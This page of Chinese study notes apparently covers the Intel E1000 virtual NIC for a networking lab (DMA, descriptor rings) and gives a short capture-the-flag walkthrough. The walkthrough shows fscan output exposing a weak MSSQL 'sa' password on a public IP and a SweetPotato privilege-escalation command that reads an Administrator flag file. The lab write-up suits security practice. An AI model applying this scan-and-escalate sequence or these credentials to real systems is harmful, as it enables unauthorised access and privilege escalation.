avatar
giacomo
  1. lab net
    1. E1000
      1. 结构
      2. 常用的寄存器
      3. DMA
      4. 描述符的结构和格式
  2. FUSE
  3. TSclient
    1. fscan 弱密码

lab net

Intel E1000 是一种虚拟网卡,而不是通常使用的实体网卡。但是在虚拟环境中被广泛应用于 VMware ESXi、VirtualBox 等虚拟化平台中,它支持大多数操作系统。

在虚拟化环境中模拟Intel 82545EM Gigabit Ethernet NIC的行为和性能。

E1000

结构

常用的寄存器

DMA

E1000 用到楽 DMA 技术,(E1000 作为一个外围设备)可以直接从内存中取数据而不需要经过 CPU。

DMA技术通常用于高速数据传输场景,如硬盘驱动器、声卡、网络卡等设备的数据传输。例如,在硬盘读写数据时,DMA控制器可以直接控制数据在硬盘和内存之间的传输,而不需要CPU介入,只有在传输开始和结束时,CPU才会收到中断请求,处理相应的开始和结束事务,这样就大大提高了数据传输的效率。

Intel 82545 EM Gigabit Ethernet NIC 使用描述符(Descriptors)和描述符环(Descriptor Rings)来管理网络数据的发送和接收。描述符是一种数据结构,记录了内存中缓冲区的位置和状态信息,使得网络接口卡(NIC)能够高效地访问和处理网络数据包。

描述符的结构和格式

对于发送(Transmit)和接收(Receive)操作,Intel 82545 EM 使用不同的描述符格式。以下是这两种操作的描述符格式的简要概述。

描述符环是一系列描述符的集合,它们在内存中形成一个循环结构。

FUSE

TSclient

fscan 弱密码

start vulscan
[*] WebTitle http://121.89.219.83      code:200 len:703    title:IIS Windows Server
[*] NetInfo
[*]121.89.219.83
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:6e:17e:86a6:24ac
[+] mssql 121.89.219.83:1433:sa 1qaz!QAZ
已完成 4/4
[*] 扫描结束,耗时: 8.1414582s

SweetPotato 提权

shell -c '-c 'C:\迅雷下载\SweetPotato.exe  -a "type C:\Users\Administrator\flag\flag01.txt''


_________  ________  ________  ___       ___  _______   ________   _________   

|\___   ___\\   ____\|\   ____\|\  \     |\  \|\  ___ \ |\   ___  \|\___   ___\ 
\|___ \  \_\ \  \___|\ \  \___|\ \  \    \ \  \ \   __/|\ \  \\ \  \|___ \  \_| 
     \ \  \ \ \_____  \ \  \    \ \  \    \ \  \ \  \_|/_\ \  \\ \  \   \ \  \  
      \ \  \ \|____|\  \ \  \____\ \  \____\ \  \ \  \_|\ \ \  \\ \  \   \ \  \ 
       \ \__\  ____\_\  \ \_______\ \_______\ \__\ \_______\ \__\\ \__\   \ \__\
        \|__| |\_________\|_______|\|_______|\|__|\|_______|\|__| \|__|    \|__|
              \|_________|                                                      


Getting flag01 is easy, right?

flag01: flag{c3f82496-1d74-478e-b80d-a0a6b2da9013}